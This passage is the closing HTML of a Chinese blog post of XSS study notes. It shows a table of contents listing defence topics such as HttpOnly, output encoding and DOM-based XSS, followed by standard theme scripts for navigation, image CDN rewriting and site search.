class="toc-nav-child"><li class="toc-nav-item toc-nav-level-3"><a class="toc-nav-link" href="#5-1-HttpOnly"><span class="toc-nav-number">1.5.1.</span> <span class="toc-nav-text">5.1 HttpOnly</span></a></li><li class="toc-nav-item toc-nav-level-3"><a class="toc-nav-link" href="#5-2-输入检查"><span class="toc-nav-number">1.5.2.</span> <span class="toc-nav-text">5.2 输入检查</span></a></li><li class="toc-nav-item toc-nav-level-3"><a class="toc-nav-link" href="#5-3-输出检查"><span class="toc-nav-number">1.5.3.</span> <span class="toc-nav-text">5.3 输出检查</span></a><ol class="toc-nav-child"><li class="toc-nav-item toc-nav-level-4"><a class="toc-nav-link" href="#5-3-1安全的编码函数"><span class="toc-nav-number">1.5.3.1.</span> <span class="toc-nav-text">5.3.1安全的编码函数</span></a></li></ol></li><li class="toc-nav-item toc-nav-level-3"><a class="toc-nav-link" href="#5-4-正确地防御XSS"><span class="toc-nav-number">1.5.4.</span> <span class="toc-nav-text">5.4 正确地防御XSS</span></a><ol class="toc-nav-child"><li class="toc-nav-item toc-nav-level-4"><a class="toc-nav-link" href="#在HTML标签中输出"><span class="toc-nav-number">1.5.4.1.</span> <span class="toc-nav-text">在HTML标签中输出</span></a></li><li class="toc-nav-item toc-nav-level-4"><a class="toc-nav-link" href="#在HTML属性中输出变量"><span class="toc-nav-number">1.5.4.2.</span> <span class="toc-nav-text">在HTML属性中输出变量</span></a></li><li class="toc-nav-item toc-nav-level-4"><a class="toc-nav-link" href="#在script标签中输出变量"><span class="toc-nav-number">1.5.4.3.</span> <span class="toc-nav-text">在script标签中输出变量</span></a></li><li class="toc-nav-item toc-nav-level-4"><a class="toc-nav-link" href="#在事件中输出变量"><span class="toc-nav-number">1.5.4.4.</span> <span class="toc-nav-text">在事件中输出变量</span></a></li><li class="toc-nav-item toc-nav-level-4"><a class="toc-nav-link" href="#在CSS中输出变量"><span class="toc-nav-number">1.5.4.5.</span> <span class="toc-nav-text">在CSS中输出变量</span></a></li><li class="toc-nav-item toc-nav-level-4"><a class="toc-nav-link" href="#在URL中输出变量"><span class="toc-nav-number">1.5.4.6.</span> <span class="toc-nav-text">在URL中输出变量</span></a></li></ol></li><li class="toc-nav-item toc-nav-level-3"><a class="toc-nav-link" href="#5-5-处理富文本"><span class="toc-nav-number">1.5.5.</span> <span class="toc-nav-text">5.5 处理富文本</span></a></li><li class="toc-nav-item toc-nav-level-3"><a class="toc-nav-link" href="#5-6正确防御DOM-base-XSS"><span class="toc-nav-number">1.5.6.</span> <span class="toc-nav-text">5.6正确防御DOM base XSS</span></a></li><li class="toc-nav-item toc-nav-level-3"><a class="toc-nav-link" href="#5-7-防御的函数"><span class="toc-nav-number">1.5.7.</span> <span class="toc-nav-text">5.7 防御的函数</span></a></li></ol></li></ol></li></ol>
        
        </div>
      </aside>
    


      <!-- Sidebar Container -->
      <div class="
                col-lg-8 col-lg-offset-1
                col-md-10 col-md-offset-1
                sidebar-container">

        <!-- Featured Tags -->
        
        <section>
          <!-- no hr -->
          <h5>
            <a href="/tags/">FEATURED TAGS</a>
          </h5>
          <div class="tags">
            
            <a class="tag" href="/tags/#WEB" title="WEB">WEB</a>
            
            <a class="tag" href="/tags/#白帽子讲WEB安全" title="白帽子讲WEB安全">白帽子讲WEB安全</a>
            
          </div>
        </section>
        

        <!-- Friends Blog -->
        
        <hr>
        <h5>FRIENDS</h5>
        <ul class="list-inline">

          
          <li>
            <a href="http://poilzero.sipc115.club/" target="_blank">poilzero</a>
          </li>
          
          <li>
            <a href="https://www.515code.com/" target="_blank">铭大佬</a>
          </li>
          
          <li>
            <a href="http://www.xcy1010.cn/" target="_blank">徐晨阳</a>
          </li>
          
          <li>
            <a href="http://derait.sipc115.club/" target="_blank">陈泓盛</a>
          </li>
          
        </ul>
        
      </div>
    </div>
  </div>
</article>



<!-- anchorjs start -->
<!-- async load function -->
<!-- anchor-js, Doc:http://bryanbraun.github.io/anchorjs/ -->
<script type="text/javascript">
  // async load function
  function async (u, c) {
    var d = document,
      t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0];
    o.src = u;
    if (c) {
      o.addEventListener('load', function(e) {
        c(null, e);
      }, false);
    }
    s.parentNode.insertBefore(o, s);
  };
</script>
<script type="text/javascript">
  //anchor-js, Doc:http://bryanbraun.github.io/anchorjs/
  async ("https://cdn.bootcss.com/anchor-js/1.1.1/anchor.min.js", function() {
    anchors.options = {
      visible: 'hover',
      placement: 'left',
      // icon: 'ℬ'
      icon: '❡'
    };
    anchors.add().remove('.intro-header h1').remove('.subheading').remove('.sidebar-container h5');
  });
</script>
<style>
  /* place left on bigger screen */
  @media all and (min-width: 800px) {
    .anchorjs-link {
      position: absolute;
      left: -0.75em;
      font-size: 1.1em;
      margin-top: -0.1em;
    }
  }
</style>

<!-- anchorjs end -->



	<!-- Footer (contains ThemeColor、viewer) -->
	<!-- Footer -->
<footer>
  <div class="container">
    <div class="row">
      <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
        <ul class="list-inline text-center">
          

          
            <li>
              <a target="_blank" href="https://github.com/urdr-gungnir">
                <span class="fa-stack fa-lg">
                  <i class="fa fa-circle fa-stack-2x"></i>
                  <i class="fa fa-github fa-stack-1x fa-inverse"></i>
                </span>
              </a>
            </li>
          

          
            <li>
              <a target="_blank" href="https://twitter.com/九日">
                <span class="fa-stack fa-lg">
                  <i class="fa fa-circle fa-stack-2x"></i>
                  <i class="fa fa-twitter fa-stack-1x fa-inverse"></i>
                </span>
              </a>
            </li>
          

          

          
            <li>
              <a target="_blank" href="https://www.facebook.com/gungnir">
                <span class="fa-stack fa-lg">
                  <i class="fa fa-circle fa-stack-2x"></i>
                  <i class="fa fa-facebook fa-stack-1x fa-inverse"></i>
                </span>
              </a>
            </li>
          

          

          
            <li>
              <a target="_blank" href="https://www.zhihu.com/people/九日">
                <span class="fa-stack fa-lg">
                  <i class="fa fa-circle fa-stack-2x"></i>
                  <i class="fa  fa-stack-1x fa-inverse">知</i>
                </span>
              </a>
            </li>
          

          

        </ul>
        <p class="copyright text-muted">
          Copyright &copy;
          gungnir
          2021
          <br>
          Theme by
          <a href="http://beantech.org" target="_blank" rel="noopener">BeanTech</a>
          <span style="display: inline-block; margin: 0 5px;">
            <i class="fa fa-heart"></i>
          </span>
          re-Ported by
          <a href="https://v-vincen.life/" target="_blank" rel="noopener">Live My Life</a>
          |
          <iframe style="margin-left: 2px; margin-bottom:-5px;" frameborder="0" scrolling="0" width="91px" height="20px" src="https://ghbtns.com/github-btn.html?user=V-Vincen&repo=V-Vincen.github.io&type=star&count=true"></iframe>
        </p>
      </div>
    </div>
  </div>
</footer>

<a id="rocket" href="#top" class=""></a>

<!-- jQuery -->
<script type="text/javascript" src="/js/jquery.min.js"></script>
<!-- <script type="text/javascript" src="/js/jquery.js"></script> -->
<!-- <script type="text/javascript" src="//cdnjs.loli.net/ajax/libs/jquery/3.2.1/jquery.min.js"></script> -->

<!-- Bootstrap Core JavaScript -->
<script type="text/javascript" src="/js/bootstrap.min.js"></script>

<!-- Custom Theme JavaScript -->
<script type="text/javascript" src="/js/hux-blog.min.js"></script>

<!-- catalog -->
<script type="text/javascript" async="true" src="/js/catalog.js?v=1.0.0"></script>

<!-- totop(rocket) -->
<script type="text/javascript" async="true" src="/js/totop.js?v=1.0.0"></script>

<!-- Busuanzi JavaScript -->

  <!-- <script type="text/javascript" async="true" src="/js/busuanzi.pure.mini.js"></script> -->
  <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>



  <!-- Scroll start -->
  <script type="text/javascript" src="/js/scroll.js"></script>
  <!-- Scroll end -->



  <!-- ThemeColor start -->
  <script type="text/javascript" src="/js/themecolor.js"></script>
  <!-- ThemeColor end -->



  <!-- CDN: jsdelivr start -->
  <script type="text/javascript">
    let imgsUrl = document.getElementsByTagName("img");
    let imgUrl = Array.from(imgsUrl);

    let jsdelivr = "https://cdn.jsdelivr.net/gh/";
    let gh = "urdr-gungnir";
    let ghPages = gh + ".github.io";
    let pagePath = "2021/02/28/跨站脚本攻击XSS的学习/";
    let jsdelivrurl;
    if (pagePath.indexOf("index.html") != -1) {
      jsdelivrurl = jsdelivr + gh + "/" + ghPages;
    }else{
      jsdelivrurl = jsdelivr + gh + "/" + ghPages + "/" + pagePath;
    }
    imgUrl.forEach(item => {
      let oldUrl = item.getAttribute("src");
      let newUrl = oldUrl.replace(oldUrl, jsdelivrurl + oldUrl).replace("..","");
      item.setAttribute("src", newUrl);
    });
  </script>
  <!-- CDN: jsdelivr end -->



  <!-- viewer start -->
  <!-- viewer start (Picture preview) -->
  <script type="text/javascript" src="/js/viewer/viewer.min.js"></script>
  <script type="text/javascript" src="/js/viewer/pic-viewer.js"></script>
  <!-- viewer end -->


<script>
  // async load function
  function async (u, c) {
    var d = document,
      t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0];
    o.src = u;
    if (c) {
      o.addEventListener('load', function (e) {
        c(null, e);
      }, false);
    }
    s.parentNode.insertBefore(o, s);
  }

  // fastClick.js
  async ("https://cdn.bootcss.com/fastclick/1.0.6/fastclick.min.js", function () {
    var $nav = document.querySelector("nav");
    if ($nav)
      FastClick.attach($nav);
    }
  )
</script>

<!-- Because of the native support for backtick-style fenced code blocks right within the Markdown is landed in Github Pages, From V1.6, There is no need for Highlight.js, so Huxblog drops it officially. -
https://github.com/blog/2100-github-pages-now-faster-and-simpler-with-jekyll-3-0 - https://help.github.com/articles/creating-and-highlighting-code-blocks/ -->
<!-- <script> async("http://cdn.bootcss.com/highlight.js/8.6/highlight.min.js", function(){ hljs.initHighlightingOnLoad(); }) </script> <link href="http://cdn.bootcss.com/highlight.js/8.6/styles/github.min.css" rel="stylesheet"> -->

<!-- jquery.tagcloud.js -->
<!-- <script> // only load tagcloud.js in tag.html if($('#tag_cloud').length !== 0){ async("http://yoursite-url/js/jquery.tagcloud.js",function(){ $.fn.tagcloud.defaults = { //size: {start: 1, end: 1, unit: 'em'}, color: {start:
'#bbbbee', end: '#0085a1'}, }; $('#tag_cloud a').tagcloud(); }) } </script> -->


	<!-- Search -->
	
	<div class="popup search-popup local-search-popup">
  <span class="popup-btn-close">
    ESC
  </span>
  <div class="container">
    <div class="row">
      <!-- <div class="col-md-9 col-md-offset-1"> -->
      <div class="col-lg-9 col-lg-offset-1 col-md-10 col-md-offset-1 local-search-content">

        <div class="local-search-header clearfix">

          <div class="local-search-input-wrapper">
            <span class="search-icon">
              <i class="fa fa-search fa-lg" style="margin: 25px 10px 25px 20px;"></i>
            </span>
            <input autocomplete="off" placeholder="Search..." type="text" id="local-search-input">
          </div>
        </div>
        <div id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>


  <script src="/js/ziploader.js"></script>
  <script>
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.json";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    // monitor main search box;
    var onPopupClose = function (e) {
      $('.popup').fadeOut(300);
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $('.popup').fadeIn(300);
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }
    // get search zip version
    $.get('/searchVersion.json?t=' + (+new Date()), function (res) {
      if (localStorage.getItem('searchVersion') !== res) {
        localStorage.setItem('searchVersion', res);
        initSearchJson();
      }
    });

    function initSearchJson() {
      initLoad(['/search.flv'], {
        loadOptions: {
          success: function (obj) {
            localStorage.setItem('searchJson', obj['search.json'])
          },
          error: function (e) {
            return console.log(e)
          }
        },
        returnOptions: {
          'json': TYPE_TEXT
        },
        mimeOptions: {
          'json': 'application/json'
        }
      })
    }
    // search function;
    var searchFunc = function (search_id, content_id) {
      'use strict';
      isfetched = true;
      var datas = JSON.parse(localStorage.getItem('searchJson'));
      // console.log(search_id)
      var input = document.getElementById(search_id);
      var resultContent = document.getElementById(content_id);
      var inputEventFunction = function () {
        var searchText = input.value.trim().toLowerCase();
        var keywords = searchText.split(/[\s\-]+/);
        if (keywords.length > 1) {
          keywords.push(searchText);
        }
        var resultItems = [];
        if (searchText.length > 0) {
          // perform local searching
          datas.forEach(function (data) {
            var isMatch = false;
            var hitCount = 0;
            var searchTextCount = 0;
            var title = data.title
              ? data.title.trim()
              : '';
            var titleInLowerCase = title.toLowerCase();
            var content = data.content
              ? data.content.trim().replace(/<[^>]+>/g, "")
              : '';
            var contentInLowerCase = content.toLowerCase();
            var articleUrl = decodeURIComponent(data.url);

            var date = data.date;
            var dateTime = date.replace(/T/, " ").replace(/.000Z/, "");
            var imgUrl = data.header_img;

            var indexOfTitle = [];
            var indexOfContent = [];
            // only match articles with not empty titles
            keywords.forEach(function (keyword) {
              function getIndexByWord(word, text, caseSensitive) {
                var wordLen = word.length;
                if (wordLen === 0) {
                  return [];
                }
                var startPosition = 0,
                  position = [],
                  index = [];
                if (!caseSensitive) {
                  text = text.toLowerCase();
                  word = word.toLowerCase();
                }
                while ((position = text.indexOf(word, startPosition)) > -1) {
                  index.push({position: position, word: word});
                  startPosition = position + wordLen;
                }
                return index;
              }
              indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
              indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
            });
            if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
              isMatch = true;
              hitCount = indexOfTitle.length + indexOfContent.length;
            }
            // show search results
            if (isMatch) {
              // sort index by position of keyword
              [indexOfTitle, indexOfContent].forEach(function (index) {
                index.sort(function (itemLeft, itemRight) {
                  if (itemRight.position !== itemLeft.position) {
                    return itemRight.position - itemLeft.position;
                  } else {
                    return itemLeft.word.length - itemRight.word.length;
                  }
                });
              });
              // merge hits into slices
              function mergeIntoSlice(text, start, end, index) {
                var item = index[index.length - 1];
                var position = item.position;
                var word = item.word;
                var hits = [];
                var searchTextCountInSlice = 0;
                while (position + word.length <= end && index.length != 0) {
                  if (word === searchText) {
                    searchTextCountInSlice++;
                  }
                  hits.push({position: position, length: word.length});
                  var wordEnd = position + word.length;
                  // move to next position of hit
                  index.pop();
                  while (index.length != 0) {
                    item = index[index.length - 1];
                    position = item.position;
                    word = item.word;
                    if (wordEnd > position) {
                      index.pop();
                    } else {
                      break;
                    }
                  }
                }
                searchTextCount += searchTextCountInSlice;
                return {hits: hits, start: start, end: end, searchTextCount: searchTextCountInSlice};
              }
              var slicesOfTitle = [];
              if (indexOfTitle.length != 0) {
                slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
              }
              var slicesOfContent = [];
              while (indexOfContent.length != 0) {
                var item = indexOfContent[indexOfContent.length - 1];
                var position = item.position;
                var word = item.word;
                // cut out 100 characters
                var start = position - 20;
                var end = position + 80;
                if (start < 0) {
                  start = 0;
                }
                if (end < position + word.length) {
                  end = position + word.length;
                }
                if (end > content.length) {
                  end = content.length;
                }
                slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
              }
              // sort slices in content by search text's count and hits' count
              slicesOfContent.sort(function (sliceLeft, sliceRight) {
                if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                  return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                  return sliceRight.hits.length - sliceLeft.hits.length;
                } else {
                  return sliceLeft.start - sliceRight.start;
                }
              });
              // select top N slices in content
              var upperBound = parseInt('1');
              if (upperBound >= 0) {
                slicesOfContent = slicesOfContent.slice(0, upperBound);
              }
              // highlight title and content
              function highlightKeyword(text, slice) {
                var result = '';
                var prevEnd = slice.start;
                slice.hits.forEach(function (hit) {
                  result += text.substring(prevEnd, hit.position);
                  var end = hit.position + hit.length;
                  result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                  prevEnd = end;
                });
                result += text.substring(prevEnd, slice.end);
                return result;
              }
              var resultItem = '';

              // if (slicesOfTitle.length != 0) {   resultItem += "<li><a target='_blank' href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>"; } else {   resultItem += "<li><a target='_blank' href='" +
              // articleUrl + "' class='search-result-title'>" + title + "</a>"; } slicesOfContent.forEach(function (slice) {   resultItem += "<a target='_blank' href='" + articleUrl + "'><p class=\"search-result\">" + highlightKeyword(content, slice) +
              // "...</p></a>"; }); resultItem += "</li>";

              if (slicesOfTitle.length != 0) {
                resultItem += "<a target='_blank' href='" + articleUrl + "' class='search-result'><div class='search-result-left'><div class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</div><time class='search-result-date'>" + dateTime + "</time>";
              } else {
                resultItem += "<a target='_blank' href='" + articleUrl + "' class='search-result'><div class='search-result-left'><div class='search-result-title'>" + title + "</div><time class='search-result-date'>" + dateTime + "</time>";
              }
              slicesOfContent.forEach(function (slice) {
                resultItem += "<p class=\"search-result-content\">" + highlightKeyword(content, slice) + "...</p>";
              });
              resultItem += "</div><div class='search-result-right'><img class='media-image' src='" + imgUrl + "' width='64px' height='48px'></img></div></a>";

              resultItems.push({item: resultItem, searchTextCount: searchTextCount, hitCount: hitCount, id: resultItems.length});
            }
          })
        };

        if (keywords.length === 1 && keywords[0] === "") {
          resultContent.innerHTML = '<div id="no-result"></div>'
        } else if (resultItems.length === 0) {
          resultContent.innerHTML = '<div id="no-result"></div>'
        } else {
          resultItems.sort(function (resultLeft, resultRight) {
            if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
              return resultRight.searchTextCount - resultLeft.searchTextCount;
            } else if (resultLeft.hitCount !== resultRight.hitCount) {
              return resultRight.hitCount - resultLeft.hitCount;
            } else {
              return resultRight.id - resultLeft.id;
            }
          });
          var searchResultList = '<div class=\"search-result-list\">';
          resultItems.forEach(function (result) {
            searchResultList += result.item;
          })
          searchResultList += "</div>";
          resultContent.innerHTML = searchResultList;
        }
      }
      if ('auto' === 'auto') {
        input.addEventListener('input', inputEventFunction);
      } else {
        $('.search-icon').click(inputEventFunction);
        input.addEventListener('keypress', function (event) {
          if (event.keyCode === 13) {
            inputEventFunction();
          }
        });
      }
      // remove loading animation
      $('body').css('overflow', '');
      proceedsearch();
    }
    // handle and trigger popup window;
    $('.popup-trigger').click(function (e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc('local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });
    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function (e) {
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 && $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });

    document.addEventListener('mouseup', (e) => {
      var _con = document.querySelector(".local-search-content");
      if (_con) {
        if (!_con.contains(e.target)) {
          onPopupClose();
        }
      }
    });
  </script>


	

	<!-- Image to hack wechat -->
	<!-- <img src="http://yoursite-url/img/icon_wechat.png" width="0" height="0" /> -->
	<!-- Migrate from head to bottom, no longer block render and still work -->

</body>

</html>
